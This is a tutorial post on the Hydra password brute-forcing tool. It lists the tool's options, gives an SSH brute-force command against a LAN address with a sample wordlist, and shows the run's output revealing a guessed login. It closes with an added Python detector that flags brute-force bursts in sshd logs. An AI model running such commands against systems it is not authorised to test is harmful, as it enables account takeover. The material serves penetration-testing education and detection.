Introduction to Hydra – Brute Force

Hydra essentially discovers passwords through brute force (trial and error): it reads candidate usernames/passwords from wordlists and tests the combinations one by one. Hydra supports the services Telnet, HTTP/HTTPS forms, SSH, MySQL, PostgreSQL, MSSQL, SMB, LDAP2 and LDAP3, FTP, SNMP, CVS and VNC, among others.

The tool comes fully installed and configured (including a graphical interface) in BackTrack; if you do not have it installed, just download the source code and compile it on any distribution.
Below are some parameters:
-R Restores aborted/crashed sessions.
-S Secure connection using SSL, if needed.
-s Specifies which port Hydra will connect to.
Syntax:
# hydra -l username -p password -t threads IP protocol
# hydra -L lista -P lista -t threads IP protocol
Explanation:
-l Name/login of the victim.
-L Loads a list containing the victims' names/logins. (1 per line)
-p Specifies a single password.
-P Loads a list of passwords. (1 per line)
-e ns Additional checks: ‘n’ tests a blank password || ‘s’ tests the user as the password.
-C Loads a file containing user:password pairs (format user:password); equivalent to -L/-P.
-M Loads a list of target servers. (1 per line)
-o Saves the passwords found to the file you specify.
-f Makes the program stop working when the password||user is found.
-t Limits the number of requests at a time. (default: 16)
-w Sets the maximum time in seconds to wait for a response from the server. (default: 30s)
-v / -V Verbose mode. ‘V’ shows every attempt.
Below is an example with the SSH protocol:
[code type=”Example”]hydra -L /tmp/wordlist.txt -P /tmp/wordlist.txt 192.168.0.101 ssh[/code]
It will run a brute force using the users in the list and the passwords in the list wordlist.txt against the server whose IP is 192.168.0.101.
Below is a “cat” of a “wordlist.txt”:
[code type=”Example of cat”]root@bt:/tmp# cat wordlist.txt
sempreupdate
hugo
diogo
danilo
paula
rosi
1234
mudar1234
P@ssw0rd
coracao
teste
teste123
root
root123
tux123
123tux[/code]

Hydra output:
[code type=”Example Hydra output”]root@bt:/tmp# hydra -L /tmp/wordlist.txt -P /tmp/wordlist.txt 192.168.0.101 ssh
Hydra v6.5 (c) 2011 by van Hauser / THC and David Maciejak – use allowed only for legal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2012-09-03 15:17:16
WARNING: Restorefile (./hydra.restore) from a previous session found, to prevent overwriting, you have 10 seconds to abort…
[DATA] 16 tasks, 1 servers, 256 login tries (l:16/p:16), ~16 tries per task
[DATA] attacking service ssh on port 22
Warning: Timeout from child 0, restarting
Warning: Timeout from child 1, restarting
Warning: Timeout from child 2, restarting
Warning: Timeout from child 3, restarting
Warning: Timeout from child 4, restarting
Warning: Timeout from child 5, restarting
Warning: Timeout from child 6, restarting
Warning: Timeout from child 7, restarting
Warning: Timeout from child 8, restarting
Warning: Timeout from child 9, restarting
Warning: Timeout from child 10, restarting
Warning: Timeout from child 11, restarting
Warning: Timeout from child 12, restarting
Warning: Timeout from child 13, restarting
Warning: Timeout from child 14, restarting
Warning: Timeout from child 15, restarting
Warning: Timeout from child 0, restarting
Warning: Timeout from child 1, restarting
Warning: Timeout from child 2, restarting
Warning: Timeout from child 3, restarting
Warning: Timeout from child 4, restarting
Warning: Timeout from child 5, restarting
Warning: Timeout from child 6, restarting
Warning: Timeout from child 7, restarting
Warning: Timeout from child 8, restarting
Warning: Timeout from child 9, restarting
Warning: Timeout from child 10, restarting
Warning: Timeout from child 11, restarting
Warning: Timeout from child 12, restarting
Warning: Timeout from child 13, restarting
Warning: Timeout from child 14, restarting
Warning: Timeout from child 15, restarting
Warning: Timeout from child 0, restarting
Warning: Timeout from child 1, restarting
Warning: Timeout from child 2, restarting
Warning: Timeout from child 3, restarting
Warning: Timeout from child 4, restarting
Warning: Timeout from child 5, restarting
Warning: Timeout from child 6, restarting
Warning: Timeout from child 7, restarting
Warning: Timeout from child 8, restarting
Warning: Timeout from child 9, restarting
Warning: Timeout from child 10, restarting
Warning: Timeout from child 11, restarting
Warning: Timeout from child 12, restarting
Warning: Timeout from child 13, restarting
Warning: Timeout from child 14, restarting
Warning: Timeout from child 15, restarting
[22][ssh] host: 192.168.0.101 login: sempreupdate password: tux123 //HERE IT IS!
Warning: Timeout from child 0, restarting
Warning: Timeout from child 1, restarting
Warning: Timeout from child 2, restarting
Warning: Timeout from child 3, restarting
Warning: Timeout from child 4, restarting
Warning: Timeout from child 5, restarting
Warning: Timeout from child 6, restarting
Warning: Timeout from child 7, restarting
Warning: Timeout from child 8, restarting
Warning: Timeout from child 9, restarting
Warning: Timeout from child 10, restarting
Warning: Timeout from child 11, restarting
Warning: Timeout from child 12, restarting
Warning: Timeout from child 13, restarting
Warning: Timeout from child 14, restarting
Warning: Timeout from child 15, restarting
Warning: Timeout from child 0, restarting
Warning: Timeout from child 1, restarting
Warning: Timeout from child 2, restarting
Warning: Timeout from child 3, restarting
Warning: Timeout from child 4, restarting
Warning: Timeout from child 5, restarting
Warning: Timeout from child 6, restarting
Warning: Timeout from child 7, restarting
Warning: Timeout from child 8, restarting
Warning: Timeout from child 9, restarting
Warning: Timeout from child 10, restarting
Warning: Timeout from child 11, restarting
Warning: Timeout from child 12, restarting
Warning: Timeout from child 13, restarting
Warning: Timeout from child 14, restarting
Warning: Timeout from child 15, restarting
Warning: Timeout from child 0, restarting
Warning: Timeout from child 1, restarting
Warning: Timeout from child 2, restarting
Warning: Timeout from child 3, restarting
Warning: Timeout from child 4, restarting
Warning: Timeout from child 5, restarting
Warning: Timeout from child 6, restarting
Warning: Timeout from child 7, restarting
Warning: Timeout from child 8, restarting
Warning: Timeout from child 9, restarting
Warning: Timeout from child 10, restarting
Warning: Timeout from child 11, restarting
Warning: Timeout from child 12, restarting
Warning: Timeout from child 13, restarting
Warning: Timeout from child 14, restarting
Warning: Timeout from child 15, restarting[/code]
Note that it tests several combinations and returns “Timeout” when it cannot complete the authentication. When it succeeds, however, it returns:
[port][protocol]   host: IP              login: “correct login”   password: “correct password”
[22][ssh]          host: 192.168.0.101   login: sempreupdate      password: tux123
Well, this was just an introduction.
Best regards to all.
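The same run seen from the target's side, as an added example that is not part of the original post: a small detector that reads sshd authentication log lines, flags a source address with a burst of failed logins, and reports any account that was accepted from that source afterwards. The log lines, the attacker address 192.168.0.50, the year and the threshold of 4 failures in 60 seconds are constructed assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sshd log lines (OpenSSH syslog format); addresses and year are assumptions.
SAMPLE_LOG = """\
Sep  3 15:17:20 srv sshd[2101]: Failed password for invalid user hugo from 192.168.0.50 port 40112 ssh2
Sep  3 15:17:21 srv sshd[2102]: Failed password for root from 192.168.0.50 port 40113 ssh2
Sep  3 15:17:22 srv sshd[2103]: Failed password for invalid user paula from 192.168.0.50 port 40114 ssh2
Sep  3 15:17:24 srv sshd[2104]: Failed password for sempreupdate from 192.168.0.50 port 40115 ssh2
Sep  3 15:17:29 srv sshd[2105]: Accepted password for sempreupdate from 192.168.0.50 port 40116 ssh2
Sep  3 15:30:02 srv sshd[2200]: Failed password for diogo from 192.168.0.77 port 51000 ssh2
Sep  3 15:31:10 srv sshd[2201]: Accepted password for diogo from 192.168.0.77 port 51001 ssh2
"""

LINE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ [\d:]{8}) \S+ sshd\[\d+\]: (?P<result>Failed|Accepted) password "
    r"for (?:invalid user )?(?P<user>\S+) from (?P<ip>\S+) port \d+")

def detect_bruteforce(log_text, threshold=4, window=timedelta(seconds=60), year=2012):
    """Return {ip: {"failures", "users", "compromised"}} for sources with >= threshold
    failed logins inside `window`; "compromised" lists accounts accepted after the burst."""
    failures = defaultdict(list)   # ip -> [(time, user)]
    alerts = {}
    for line in log_text.splitlines():
        m = LINE.match(line)
        if not m:
            continue
        # Syslog timestamps carry no year, so one is supplied (assumption).
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        ip, user = m["ip"], m["user"]
        if m["result"] == "Failed":
            failures[ip].append((ts, user))
            recent = [(t, u) for t, u in failures[ip] if ts - t <= window]
            if len(recent) >= threshold:
                alert = alerts.setdefault(ip, {"failures": 0, "users": set(), "compromised": []})
                alert["failures"] = max(alert["failures"], len(recent))
                alert["users"].update(u for _, u in recent)
        elif ip in alerts:
            # A success from a source that already crossed the threshold: likely a guessed password.
            alerts[ip]["compromised"].append(user)
    return alerts

if __name__ == "__main__":
    for ip, a in detect_bruteforce(SAMPLE_LOG).items():
        print(ip, a["failures"], sorted(a["users"]), a["compromised"])
```

The single failed attempt followed by a success from 192.168.0.77 stays below the threshold and is not reported, which is the distinction between a user mistyping a password and a wordlist run.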